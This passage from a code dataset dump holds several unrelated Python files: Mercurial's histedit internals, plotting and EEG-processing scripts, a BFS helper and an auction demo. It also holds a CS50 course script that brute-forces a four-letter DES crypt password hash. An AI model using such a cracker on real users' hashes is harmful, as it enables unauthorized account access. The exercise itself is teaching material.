ctxs = [repo[r] for r in revs]\n\n wctx = repo[None]\n # Please don't ask me why `ancestors` is this value. I figured it\n # out with print-debugging, not by actually understanding what the\n # merge code is doing. :(\n ancs = [repo[b'.']]\n # Sniff-test to make sure we won't collide with untracked files in\n # the working directory. If we don't do this, we can get a\n # collision after we've started histedit and backing out gets ugly\n # for everyone, especially the user.\n for c in [ctxs[0].p1()] + ctxs:\n try:\n mergemod.calculateupdates(\n repo,\n wctx,\n c,\n ancs,\n # These parameters were determined by print-debugging\n # what happens later on inside histedit.\n branchmerge=False,\n force=False,\n acceptremote=False,\n followcopies=False,\n )\n except error.Abort:\n raise error.Abort(\n _(\n b\"untracked files in working directory conflict with files in %s\"\n )\n % c\n )\n\n if not rules:\n comment = geteditcomment(ui, short(root), short(topmost))\n actions = [pick(state, r) for r in revs]\n rules = ruleeditor(repo, ui, actions, comment)\n else:\n rules = _readfile(ui, rules)\n actions = parserules(rules, state)\n warnverifyactions(ui, repo, actions, state, ctxs)\n\n parentctxnode = repo[root].p1().node()\n\n state.parentctxnode = parentctxnode\n state.actions = actions\n state.topmost = topmost\n state.replacements = []\n\n ui.log(\n b\"histedit\",\n b\"%d actions to histedit\\n\",\n len(actions),\n histedit_num_actions=len(actions),\n )\n\n # Create a backup so we can always abort completely.\n backupfile = None\n if not obsolete.isenabled(repo, obsolete.createmarkersopt):\n backupfile = repair.backupbundle(\n repo, [parentctxnode], [topmost], root, b'histedit'\n )\n state.backupfile = backupfile\n\n\ndef _getsummary(ctx):\n # a common pattern is to extract the summary but default to the empty\n # string\n summary = ctx.description() or b''\n if summary:\n summary = summary.splitlines()[0]\n return summary\n\n\ndef bootstrapcontinue(ui, state, opts):\n repo = state.repo\n\n ms = mergestatemod.mergestate.read(repo)\n mergeutil.checkunresolved(ms)\n\n if state.actions:\n actobj = state.actions.pop(0)\n\n if _isdirtywc(repo):\n actobj.continuedirty()\n if _isdirtywc(repo):\n abortdirty()\n\n parentctx, replacements = actobj.continueclean()\n\n state.parentctxnode = parentctx.node()\n 
state.replacements.extend(replacements)\n\n return state\n\n\ndef between(repo, old, new, keep):\n \"\"\"select and validate the set of revision to edit\n\n When keep is false, the specified set can't have children.\"\"\"\n revs = repo.revs(b'%n::%n', old, new)\n if revs and not keep:\n rewriteutil.precheck(repo, revs, b'edit')\n if repo.revs(b'(%ld) and merge()', revs):\n raise error.Abort(_(b'cannot edit history that contains merges'))\n return pycompat.maplist(repo.changelog.node, revs)\n\n\ndef ruleeditor(repo, ui, actions, editcomment=b\"\"):\n \"\"\"open an editor to edit rules\n\n rules are in the format [ [act, ctx], ...] like in state.rules\n \"\"\"\n if repo.ui.configbool(b\"experimental\", b\"histedit.autoverb\"):\n newact = util.sortdict()\n for act in actions:\n ctx = repo[act.node]\n summary = _getsummary(ctx)\n fword = summary.split(b' ', 1)[0].lower()\n added = False\n\n # if it doesn't end with the special character '!' just skip this\n if fword.endswith(b'!'):\n fword = fword[:-1]\n if fword in primaryactions | secondaryactions | tertiaryactions:\n act.verb = fword\n # get the target summary\n tsum = summary[len(fword) + 1 :].lstrip()\n # safe but slow: reverse iterate over the actions so we\n # don't clash on two commits having the same summary\n for na, l in reversed(list(pycompat.iteritems(newact))):\n actx = repo[na.node]\n asum = _getsummary(actx)\n if asum == tsum:\n added = True\n l.append(act)\n break\n\n if not added:\n newact[act] = []\n\n # copy over and flatten the new list\n actions = []\n for na, l in pycompat.iteritems(newact):\n actions.append(na)\n actions += l\n\n rules = b'\\n'.join([act.torule() for act in actions])\n rules += b'\\n\\n'\n rules += editcomment\n rules = ui.edit(\n rules,\n ui.username(),\n {b'prefix': b'histedit'},\n repopath=repo.path,\n action=b'histedit',\n )\n\n # Save edit rules in .hg/histedit-last-edit.txt in case\n # the user needs to ask for help after something\n # surprising happens.\n with repo.vfs(b'histedit-last-edit.txt', b'wb') as f:\n f.write(rules)\n\n return rules\n\n\ndef parserules(rules, state):\n \"\"\"Read the histedit rules string and return list of action objects\"\"\"\n rules = [\n l\n for l in (r.strip() for r in rules.splitlines())\n if l and not l.startswith(b'#')\n ]\n actions = []\n for r in rules:\n if b' ' not in r:\n raise error.ParseError(_(b'malformed line \"%s\"') % r)\n verb, rest = r.split(b' ', 1)\n\n if verb not in actiontable:\n raise error.ParseError(_(b'unknown action \"%s\"') % verb)\n\n action = actiontable[verb].fromrule(state, rest)\n actions.append(action)\n return actions\n\n\ndef warnverifyactions(ui, repo, actions, state, ctxs):\n try:\n verifyactions(actions, state, ctxs)\n except error.ParseError:\n if repo.vfs.exists(b'histedit-last-edit.txt'):\n ui.warn(\n _(\n b'warning: histedit rules saved '\n b'to: .hg/histedit-last-edit.txt\\n'\n )\n )\n raise\n\n\ndef verifyactions(actions, state, ctxs):\n \"\"\"Verify that there exists exactly one action per given changeset and\n other constraints.\n\n Will abort if there are to many or too few rules, a malformed rule,\n or a rule on a changeset outside of the user-given range.\n \"\"\"\n expected = {c.node() for c in ctxs}\n seen = set()\n prev = None\n\n if actions and actions[0].verb in [b'roll', b'fold']:\n raise error.ParseError(\n _(b'first changeset cannot use verb \"%s\"') % actions[0].verb\n )\n\n for action in actions:\n action.verify(prev, expected, seen)\n prev = action\n if action.node is not None:\n seen.add(action.node)\n 
missing = sorted(expected - seen) # sort to stabilize output\n\n if state.repo.ui.configbool(b'histedit', b'dropmissing'):\n if len(actions) == 0:\n raise error.ParseError(\n _(b'no rules provided'),\n hint=_(b'use strip extension to remove commits'),\n )\n\n drops = [drop(state, n) for n in missing]\n # put the in the beginning so they execute immediately and\n # don't show in the edit-plan in the future\n actions[:0] = drops\n elif missing:\n raise error.ParseError(\n _(b'missing rules for changeset %s') % short(missing[0]),\n hint=_(\n b'use \"drop %s\" to discard, see also: '\n b\"'hg help -e histedit.config'\"\n )\n % short(missing[0]),\n )\n\n\ndef adjustreplacementsfrommarkers(repo, oldreplacements):\n \"\"\"Adjust replacements from obsolescence markers\n\n Replacements structure is originally generated based on\n histedit's state and does not account for changes that are\n not recorded there. This function fixes that by adding\n data read from obsolescence markers\"\"\"\n if not obsolete.isenabled(repo, obsolete.createmarkersopt):\n return oldreplacements\n\n unfi = repo.unfiltered()\n get_rev = unfi.changelog.index.get_rev\n obsstore = repo.obsstore\n newreplacements = list(oldreplacements)\n oldsuccs = [r[1] for r in oldreplacements]\n # successors that have already been added to succstocheck once\n seensuccs = set().union(\n *oldsuccs\n ) # create a set from an iterable of tuples\n succstocheck = list(seensuccs)\n while succstocheck:\n n = succstocheck.pop()\n missing = get_rev(n) is None\n markers = obsstore.successors.get(n, ())\n if missing and not markers:\n # dead end, mark it as such\n newreplacements.append((n, ()))\n for marker in markers:\n nsuccs = marker[1]\n newreplacements.append((n, nsuccs))\n for nsucc in nsuccs:\n if nsucc not in seensuccs:\n seensuccs.add(nsucc)\n succstocheck.append(nsucc)\n\n return newreplacements\n\n\ndef processreplacement(state):\n \"\"\"process the list of replacements to return\n\n 1) the final mapping between original and created nodes\n 2) the list of temporary node created by histedit\n 3) the list of new commit created by histedit\"\"\"\n replacements = adjustreplacementsfrommarkers(state.repo, state.replacements)\n allsuccs = set()\n replaced = set()\n fullmapping = {}\n # initialize basic set\n # fullmapping records all operations recorded in replacement\n for rep in replacements:\n allsuccs.update(rep[1])\n replaced.add(rep[0])\n fullmapping.setdefault(rep[0], set()).update(rep[1])\n new = allsuccs - replaced\n tmpnodes = allsuccs & replaced\n # Reduce content fullmapping into direct relation between original nodes\n # and final node created during history edition\n # Dropped changeset are replaced by an empty list\n toproceed = set(fullmapping)\n final = {}\n while toproceed:\n for x in list(toproceed):\n succs = fullmapping[x]\n for s in list(succs):\n if s in toproceed:\n # non final node with unknown closure\n # We can't process this now\n break\n elif s in final:\n # non final node, replace with closure\n succs.remove(s)\n succs.update(final[s])\n else:\n final[x] = succs\n toproceed.remove(x)\n # remove tmpnodes from final mapping\n for n in tmpnodes:\n del final[n]\n # we expect all changes involved in final to exist in the repo\n # turn `final` into list (topologically sorted)\n get_rev = state.repo.changelog.index.get_rev\n for prec, succs in final.items():\n final[prec] = sorted(succs, key=get_rev)\n\n # computed topmost element (necessary for bookmark)\n if new:\n newtopmost = sorted(new, 
key=state.repo.changelog.rev)[-1]\n elif not final:\n # Nothing rewritten at all. we won't need `newtopmost`\n # It is the same as `oldtopmost` and `processreplacement` know it\n newtopmost = None\n else:\n # every body died. The newtopmost is the parent of the root.\n r = state.repo.changelog.rev\n newtopmost = state.repo[sorted(final, key=r)[0]].p1().node()\n\n return final, tmpnodes, new, newtopmost\n\n\ndef movetopmostbookmarks(repo, oldtopmost, newtopmost):\n \"\"\"Move bookmark from oldtopmost to newly created topmost\n\n This is arguably a feature and we may only want that for the active\n bookmark. But the behavior is kept compatible with the old version for now.\n \"\"\"\n if not oldtopmost or not newtopmost:\n return\n oldbmarks = repo.nodebookmarks(oldtopmost)\n if oldbmarks:\n with repo.lock(), repo.transaction(b'histedit') as tr:\n marks = repo._bookmarks\n changes = []\n for name in oldbmarks:\n changes.append((name, newtopmost))\n marks.applychanges(repo, tr, changes)\n\n\ndef cleanupnode(ui, repo, nodes, nobackup=False):\n \"\"\"strip a group of nodes from the repository\n\n The set of node to strip may contains unknown nodes.\"\"\"\n with repo.lock():\n # do not let filtering get in the way of the cleanse\n # we should probably get rid of obsolescence marker created during the\n # histedit, but we currently do not have such information.\n repo = repo.unfiltered()\n # Find all nodes that need to be stripped\n # (we use %lr instead of %ln to silently ignore unknown items)\n has_node = repo.changelog.index.has_node\n nodes = sorted(n for n in nodes if has_node(n))\n roots = [c.node() for c in repo.set(b\"roots(%ln)\", nodes)]\n if roots:\n backup = not nobackup\n repair.strip(ui, repo, roots, backup=backup)\n\n\ndef stripwrapper(orig, ui, repo, nodelist, *args, **kwargs):\n if isinstance(nodelist, bytes):\n nodelist = [nodelist]\n state = histeditstate(repo)\n if state.inprogress():\n state.read()\n histedit_nodes = {\n action.node for action in state.actions if action.node\n }\n common_nodes = histedit_nodes & set(nodelist)\n if common_nodes:\n raise error.Abort(\n _(b\"histedit in progress, can't strip %s\")\n % b', '.join(short(x) for x in common_nodes)\n )\n return orig(ui, repo, nodelist, *args, **kwargs)\n\n\nextensions.wrapfunction(repair, b'strip', stripwrapper)\n\n\ndef summaryhook(ui, repo):\n state = histeditstate(repo)\n if not state.inprogress():\n return\n state.read()\n if state.actions:\n # i18n: column positioning for \"hg summary\"\n ui.write(\n _(b'hist: %s (histedit --continue)\\n')\n % (\n ui.label(_(b'%d remaining'), b'histedit.remaining')\n % len(state.actions)\n )\n )\n\n\ndef extsetup(ui):\n cmdutil.summaryhooks.add(b'histedit', summaryhook)\n statemod.addunfinished(\n b'histedit',\n fname=b'histedit-state',\n allowcommit=True,\n continueflag=True,\n abortfunc=hgaborthistedit,\n )\n","repo_name":"JetBrains/intellij-community","sub_path":"plugins/hg4idea/testData/bin/hgext/histedit.py","file_name":"histedit.py","file_ext":"py","file_size_in_byte":79138,"program_lang":"python","lang":"en","doc_type":"code","stars":16005,"dataset":"github-code","pt":"66"} +{"seq_id":"15172884814","text":"# Crack a DES-based hashed password of length 4\nimport sys\nimport crypt\n\ndef list_to_string(*lst):\n return ''.join(lst)\n\nif len(sys.argv) != 2:\n sys.exit(\"Expected a hashed password !\")\nlst,flag,inpute = [],False,sys.argv[1]\nfor a in [chr(x) for x in range(ord('A'),ord('z')+1) if chr(x).isalpha()]:\n for b in [chr(x) for x in range(ord('A'),ord('z')+1) if 
chr(x).isalpha()]:\n        for c in [chr(x) for x in range(ord('A'),ord('z')+1) if chr(x).isalpha()]:\n            for d in [chr(x) for x in range(ord('A'),ord('z')+1) if chr(x).isalpha()]:\n                lst[:] = [a, b, c, d]  # build the current candidate password\n                hashe = crypt.crypt(list_to_string(*lst),\"50\")\n                if hashe == inpute:\n                    flag = True\n                    break\n            if flag:\n                break\n        if flag:\n            break\n    if flag:\n        break\nprint(list_to_string(*lst))\n","repo_name":"ahmedkrmn/CS50-Introduction-to-Computer-Science-SOLUTIONS","sub_path":"pset06/crack2.py","file_name":"crack2.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72732617811","text":"import matplotlib.pyplot as plt\nimport openpyxl\n\n# read the data\npath = \"./data.xlsx\"\nbook = openpyxl.open(path, read_only=True)\nsheet = book.active\ndata = []\n\n# raw data\nfor row in range(1, 100000):\n    try:\n        data.append(float(sheet[row][0].value))\n    except IndexError:\n        break\n    except ValueError:\n        continue\n\nvolume = len(data)\nnum_bins = int(volume / 7)\n\n# compute the bin boundaries\nstep = (max(data) - min(data)) / num_bins\nbins = [min(data) + step / 2]\n\nfor i in range(num_bins):\n    bins.append(bins[-1] + step)\n\n# compute the frequency of each bin\nfrequencies = [0] * num_bins\nfor d in data:\n    for i in range(num_bins):\n        if bins[i] <= d < bins[i + 1]:\n            frequencies[i] += 1\n            break\n\n# draw the histogram\nfig, ax = plt.subplots(figsize=(13, 6))\nfor i in range(num_bins):\n    rect = plt.Rectangle((bins[i], 0), step, frequencies[i], color='pink', ec='red')\n    ax.add_patch(rect)\nax.set_xlim([min(data) - 1, max(data) + 2])\nax.set_ylim([0, max(frequencies) + 1])\nplt.xticks(bins)\n\n# style the chart\nplt.xlabel(\"Values\")\nplt.ylabel(\"Amount\")\nplt.title(\"Statistical Histogram\")\nplt.legend([\"Values\"], loc=2, frameon=True)\nplt.grid(linestyle='--', color='pink')\n\nplt.show()\n","repo_name":"Mambulya/UniversityPY","sub_path":"StatisticalHistogram.py","file_name":"StatisticalHistogram.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24518076691","text":"\"\"\"Create plots for learning from varying numbers of demonstrations.\"\"\"\n\nimport os\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom scripts.analyze_results_directory import create_dataframes, \\\n    get_df_for_entry\n\npd.set_option('chained_assignment', None)\n# plt.rcParams[\"font.family\"] = \"CMU Serif\"\n\n############################ Change below here ################################\n\n# Details about the plt figure.\nDPI = 500\nFONT_SIZE = 18\n\n# Groups over which to take mean/std.\nGROUPS = [\n    \"ENV\", \"APPROACH\", \"EXCLUDED_PREDICATES\", \"EXPERIMENT_ID\",\n    \"NUM_TRAIN_TASKS\", \"CYCLE\"\n]\n\n# All column names and keys to load into the pandas tables before plotting.\nCOLUMN_NAMES_AND_KEYS = [\n    (\"ENV\", \"env\"),\n    (\"APPROACH\", \"approach\"),\n    (\"EXCLUDED_PREDICATES\", \"excluded_predicates\"),\n    (\"EXPERIMENT_ID\", \"experiment_id\"),\n    (\"SEED\", \"seed\"),\n    (\"NUM_TRAIN_TASKS\", \"num_train_tasks\"),\n    (\"CYCLE\", \"cycle\"),\n    (\"NUM_SOLVED\", \"num_solved\"),\n    (\"AVG_NUM_PREDS\", \"avg_num_preds\"),\n    (\"AVG_TEST_TIME\", \"avg_suc_time\"),\n    (\"AVG_NODES_CREATED\", \"avg_num_nodes_created\"),\n    (\"LEARNING_TIME\", \"learning_time\"),\n    (\"PERC_SOLVED\", \"perc_solved\"),\n]\n\nDERIVED_KEYS = [(\"perc_solved\",\n                 lambda r: 100 * r[\"num_solved\"] / 
r[\"num_test_tasks\"])]\n\n# The first element is the name of the metric that will be plotted on the\n# x axis. See COLUMN_NAMES_AND_KEYS for all available metrics. The second\n# element is used to label the x axis.\nX_KEY_AND_LABEL = [\n (\"NUM_TRAIN_TASKS\", \"Number of Training Tasks\"),\n # (\"LEARNING_TIME\", \"Learning time in seconds\"),\n]\n\n# Same as above, but for the y axis.\nY_KEY_AND_LABEL = [\n (\"PERC_SOLVED\", \"% Evaluation Tasks Solved\"),\n # (\"AVG_NODES_CREATED\", \"Averaged nodes created\"),\n]\n\n# PLOT_GROUPS is a nested dict where each outer dict corresponds to one plot,\n# and each inner entry corresponds to one line on the plot.\n# The keys of the outer dict are plot titles.\n# The keys of the inner dict are (legend label, marker, df selector).\nPLOT_GROUPS = {\n \"Learning from Few Demonstrations\": [\n (\"PickPlace1D\", \"o\",\n lambda df: df[\"EXPERIMENT_ID\"].apply(lambda v: \"cover_main_\" in v)),\n (\"Blocks\", \".\",\n lambda df: df[\"EXPERIMENT_ID\"].apply(lambda v: \"blocks_main_\" in v)),\n (\"Painting\", \"*\",\n lambda df: df[\"EXPERIMENT_ID\"].apply(lambda v: \"painting_main_\" in v)\n ),\n (\"Tools\", \"s\",\n lambda df: df[\"EXPERIMENT_ID\"].apply(lambda v: \"tools_main_\" in v)),\n ],\n \"GNN Shooting LfD\": [\n (\"PickPlace1D\", \"o\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"cover_gnn_shooting_\" in v)),\n (\"Blocks\", \".\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"blocks_gnn_shooting_\" in v)),\n (\"Painting\", \"*\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"painting_gnn_shooting_\" in v)),\n (\"Tools\", \"s\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"tools_gnn_shooting_\" in v)),\n ],\n \"GNN Model-Free LfD\": [\n (\"PickPlace1D\", \"o\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"cover_gnn_modelfree_\" in v)),\n (\"Blocks\", \".\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"blocks_gnn_modelfree_\" in v)),\n (\"Painting\", \"*\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"painting_gnn_modelfree_\" in v)),\n (\"Tools\", \"s\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"tools_gnn_modelfree_\" in v)),\n ],\n}\n\n# If True, add (0, 0) to every plot\nADD_ZERO_POINT = True\n\nY_LIM = (-5, 110)\n\n#################### Should not need to change below here #####################\n\n\ndef _main() -> None:\n outdir = os.path.join(os.path.dirname(os.path.realpath(__file__)),\n \"results\")\n os.makedirs(outdir, exist_ok=True)\n matplotlib.rcParams.update({'font.size': FONT_SIZE})\n grouped_means, grouped_stds, _ = create_dataframes(COLUMN_NAMES_AND_KEYS,\n GROUPS, DERIVED_KEYS)\n means = grouped_means.reset_index()\n stds = grouped_stds.reset_index()\n for x_key, x_label in X_KEY_AND_LABEL:\n for y_key, y_label in Y_KEY_AND_LABEL:\n for plot_title, d in PLOT_GROUPS.items():\n _, ax = plt.subplots()\n for label, marker, selector in d:\n exp_means = get_df_for_entry(x_key, means, selector)\n exp_stds = get_df_for_entry(x_key, stds, selector)\n xs = exp_means[x_key].tolist()\n ys = exp_means[y_key].tolist()\n y_stds = exp_stds[y_key].tolist()\n if ADD_ZERO_POINT:\n xs = [0] + xs\n ys = [0] + ys\n y_stds = [0] + y_stds\n ax.errorbar(xs,\n ys,\n yerr=y_stds,\n label=label,\n marker=marker)\n ax.set_xticks(xs)\n ax.set_title(plot_title)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n ax.set_ylim(Y_LIM)\n plt.legend()\n plt.tight_layout()\n filename = f\"{plot_title}_{x_key}_{y_key}.png\"\n filename = filename.replace(\" \", \"_\").lower()\n outfile = 
os.path.join(outdir, filename)\n                plt.savefig(outfile, dpi=DPI)\n                print(f\"Wrote out to {outfile}\")\n\n\nif __name__ == \"__main__\":\n    _main()\n","repo_name":"Learning-and-Intelligent-Systems/predicators","sub_path":"scripts/plotting/create_num_demos_plots.py","file_name":"create_num_demos_plots.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"66"} +{"seq_id":"37819187882","text":"import collections\nfrom functools import cache\nfrom typing import Tuple\n\n\n@cache\ndef bfs(graph: Tuple[Tuple[int]], root: int):\n    visited, queue, distance = set(), collections.deque([root]), collections.defaultdict(int)\n    visited.add(root)\n\n    while queue:\n\n        # Dequeue a vertex from the queue; do not expand vertices\n        # that are already more than two hops from the root\n        vertex: int = queue.popleft()\n        if distance[vertex] > 2:\n            continue\n\n        # Visit each unvisited neighbour, enqueue it,\n        # and record its distance from the root\n        for neighbour in graph[vertex]:\n            if neighbour not in visited:\n                visited.add(neighbour)\n                queue.append(neighbour)\n                distance[neighbour] = distance[vertex] + 1\n\n    return distance\n","repo_name":"youngdashu/military_logistics","sub_path":"graph/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"35751043179","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('Srinacharindosimetr.tif',-1)\n \nimg_R = img[:,:,2]\n#img_R = img\n\n#equ = cv2.equalizeHist(img_R)\n\n#color = ('b','g','r')\n#for i,col in enumerate(color):\n#    histr = cv2.calcHist([img],[i],None,[256],[0,256])\n#    plt.plot(histr,color = col)\n#    plt.xlim([0,256])\n#plt.show()\n\nplt.figure()\nplt.hist(img_R.ravel(),256); \n#plt.hist(equ.ravel(),256,[0,256]);\n#plt.xlim([0,256]) \nplt.show()\n\nplt.figure()\n#imgplot = plt.imshow(img)\nimgplot = plt.imshow(img_R, cmap= 'gray', clim=(0.0,2500.0))\nplt.show()\n#imgplot3 = plt.imshow(equ)\n\n#cv2.imshow('img_R',img_R)\n#cv2.imshow('equ',equ)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n\n","repo_name":"roymlapera/Experimental-4---Films-Gamma-Index","sub_path":"Radiochromic Film Calibration/leer_archivo_tiff.py","file_name":"leer_archivo_tiff.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18419644797","text":"from auction import Auction\nimport random\n#\n# Demonstrate use of the Auction class.\n#\n\ndef demo_auction():\n    \"\"\"Run a random auction. 
Stop after max_bids bids.\"\"\"\n    # number of bids to accept\n    max_bids = 10\n    auction = Auction(\"Vacation to Ko Samui\")\n    auction.start()\n    print(\"Starting\", auction, \"with min bidding increment\", auction.increment)\n    #auction.bid(\"initial\", 20)\n    for n in range(0,max_bids):\n        bidder = get_bidder(auction)\n        amount = int(auction.best_bid() + 10*random.randint(-2,5) + 10)\n        print_and_bid(auction,bidder,amount)\n        # pause the auction\n        if n == max_bids/2:\n            print(\">>> stop()\")\n            auction.stop()\n        elif n == max_bids/2 + 1:\n            print(\">>> start()\")\n            auction.start()\n    \n    print(\"The winner is\", auction.winner(), \"with a bid of\", auction.best_bid())\n\ndef get_bidder(auction):\n    \"\"\"get a random bidder\"\"\"\n    bidders = [\"Ant\", \"Bat\", \"Cat\", \"Dog\" ]\n    winner = auction.winner()\n    if winner in bidders:\n        start = bidders.index(winner)\n    else:\n        start = -1\n    # this avoids selecting the same bidder again\n    nextbidder = (start + random.randint(1,len(bidders)-1)) % len(bidders)\n    return bidders[nextbidder]\n    \ndef print_and_bid(auction, bidder, amount):\n    print(f'>>> bid( {bidder}, {amount} )')\n    try:\n        auction.bid(bidder, amount)\n    except Exception as e:\n        ex_name = type(e).__name__\n        print(f'{ex_name}:', e)\n\nif __name__ == \"__main__\":\n    demo_auction()\n","repo_name":"Noboomta/ISP-SKE-KU-2020","sub_path":"unit-testing-Noboomta/demo_auction.py","file_name":"demo_auction.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37465920802","text":"import re\n\"\"\"\nCompress each '<deal> = Verdict: ...' summary line of the 0fc log\ninto one '<verdict letter>\\t<deal number>' line.\n\"\"\"\n\nwith open('0fc-log.lg.txt', 'rt') as f:\n    with open('0fc-log.lg-compress.txt', 'wt') as o:\n        for line in f:\n            m = re.match(\n                r'^([0-9]+) = Verdict: (Intractable|Solved|Unsolved)' +\n                r' ; Iters: [0-9]+ ; Length: (?:[0-9]+|-1)$',\n                line)\n            if not m:\n                raise ValueError('match error')\n            o.write('%s\\t%s\\n' % (m.group(2)[0], m.group(1)))\n","repo_name":"shlomif/freecell-pro-0fc-deals","sub_path":"compress-summary-fc-solve-log.py","file_name":"compress-summary-fc-solve-log.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"8103357749","text":"import pandas as pd\nfrom scipy import signal\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport ipywidgets as widgets\nimport os\nimport re\nimport csv\n\ndef process_folder(path_to_folder, chan_name, target_freq=None, extra_name=None, hf=45, lf=1, epoch_length=6, filter=True):\n    if extra_name == 'path':\n        extra_name = os.path.basename(path_to_folder)+': '\n    eeg_data = []\n    for filename in os.listdir(path_to_folder):\n        if '_ExG.csv' in filename:\n            full_path = os.path.join(path_to_folder, filename)\n            \n            filename = filename[:filename.rindex('_')]\n            \n            if extra_name:\n                filename = extra_name+filename\n            \n            target = target_freq\n            if target_freq == 'auto':\n                number_pattern = r'\\d+(?:\\.\\d+)?'\n                filename_copy = filename.replace('_', '.')\n                target = [float(x) for x in re.findall(number_pattern, filename_copy)]\n\n            eeg_data.append(EEG_Data(full_path,title = filename, chan_name=chan_name, stimulus_frequency=target, hf=hf, lf=lf, epoch_length=epoch_length, filter=filter))\n    return eeg_data\n\n# chan_list = ['ch1', 'ch2', 'ch3', 'ch4', 'ch5', 'ch6']\n\nclass EEG_Data:\n    raw_signal: np.ndarray = None\n    filtered_signal: np.ndarray = None\n    epoch_signal: np.ndarray = None\n    chan_name: list = None\n    chan_list: list = None\n    n_chan: int = None\n    title: str = None\n
    stimulus_frequency: float = None\n    hf: float = None\n    lf: float = None\n    timestamp: np.ndarray = None\n\n    def __init__(self, path: str = None, title: str = None, stimulus_frequency: float = None, chan_name: list = None, epoch_length=6, fs=250, lf=1, hf=45, filter=True):\n        self.title = title\n        self.stimulus_frequency = stimulus_frequency\n        self.chan_name = chan_name.copy()\n        self.n_chan = len(chan_name)\n        self.chan_list = ['ch' + str(i) for i in range(1, self.n_chan + 1)]\n\n        if path is not None:\n            self.data = pd.read_csv(path)\n            self.timestamp = self.data['TimeStamp'].to_numpy()\n            try:\n                self.raw_signal = self.data[self.chan_name].to_numpy().T\n            except KeyError:\n                # fall back to the generic channel names if the named columns are missing\n                self.raw_signal = self.data[self.chan_list].to_numpy().T\n            self.hf = hf\n            self.lf = lf\n            if filter:\n                self.filtered_signal = np.array(filt(self.raw_signal, fs, lf, hf))\n            else:\n                self.filtered_signal = self.raw_signal.copy()\n            self.epoch_signal = reshape_to_epochs(self.filtered_signal, epoch_length=epoch_length, fs=fs)\n\n\n    def get_epoched_signal(self, epoch_length=6, fs=250):\n        return reshape_to_epochs(self.filtered_signal, epoch_length=epoch_length, fs=fs)\n    \n    def add_signal(self, eeg, stack=False):\n        if eeg is None:\n            return\n        if isinstance(eeg, EEG_Data):\n            eeg = eeg.filtered_signal\n        if self.filtered_signal is None:\n            self.filtered_signal = eeg\n        else:\n            # keep the minimum length of the two signals\n            min_length = min(self.filtered_signal.shape[1], eeg.shape[1])\n            # cut the signals to the minimum length\n            self.filtered_signal = self.filtered_signal[:, :min_length]\n            eeg = eeg[:, :min_length]\n            # stack=True sums the signals sample-wise; stack=False appends them as extra channels\n            if stack:\n                self.filtered_signal = self.filtered_signal + eeg\n            else:\n                self.filtered_signal = np.vstack((self.filtered_signal, eeg))\n\n\n    def cut_signal(self, start, end=None, cut_to=True, fs=250):\n        start = int(start * fs)\n        if end:\n            end = int(end * fs)\n        output = []\n        for i in range(0, len(self.filtered_signal)):\n            if cut_to:\n                output.append(self.filtered_signal[i][start:end])\n            else:\n                output.append(self.filtered_signal[i][start:len(self.filtered_signal[i]) - end])\n        self.filtered_signal = np.array(output)\n    \n\n\n    def remove_channels(self, chan_name_list):\n        print('Original channel names:', self.chan_name)\n        for channel in chan_name_list:\n            # get index in chan_name where channel is\n            index = self.chan_name.index(channel)\n\n            # remove channel from chan_name\n            self.chan_name.pop(index)\n            self.chan_list.pop(index)\n            self.n_chan = len(self.chan_name)\n\n            # remove channel from filtered_signal, raw_signal, epoch_signal\n            self.filtered_signal = np.delete(self.filtered_signal, index, 0)\n            self.raw_signal = np.delete(self.raw_signal, index, 0)\n            self.epoch_signal = np.delete(self.epoch_signal, index, 0)\n        print('Updated channel names:', self.chan_name)\n\n    \n\n\n# Source https://github.com/Mentalab-hub/explorepy/blob/master/examples/ssvep_demo/offline_analysis.py\ndef custom_filter(exg, lf, hf, fs, type):\n    \"\"\"\n    Args:\n        exg: EEG signal with the shape: (N_chan, N_sample)\n        lf: Low cutoff frequency\n        hf: High cutoff frequency\n        fs: Sampling rate\n        type: Filter type, 'bandstop' or 'bandpass'\n\n    Returns:\n        (numpy ndarray): Filtered signal (N_chan, N_sample)\n    \"\"\"\n    N = 4\n    b, a = signal.butter(N, [lf / (fs/2), hf / (fs/2)], type)\n    return signal.filtfilt(b, a, exg)\n\n# Signal filtering: bandstop 45-55Hz, then bandpass lf-hf\ndef filt(sig,fs, lf, hf):\n    filt_sig = custom_filter(sig, 45, 55, fs, 'bandstop')\n    filt_sig = custom_filter(filt_sig, lf, hf, fs, 'bandpass')\n    return filt_sig\n\n\ndef new_psd_plot(eeg_data, 
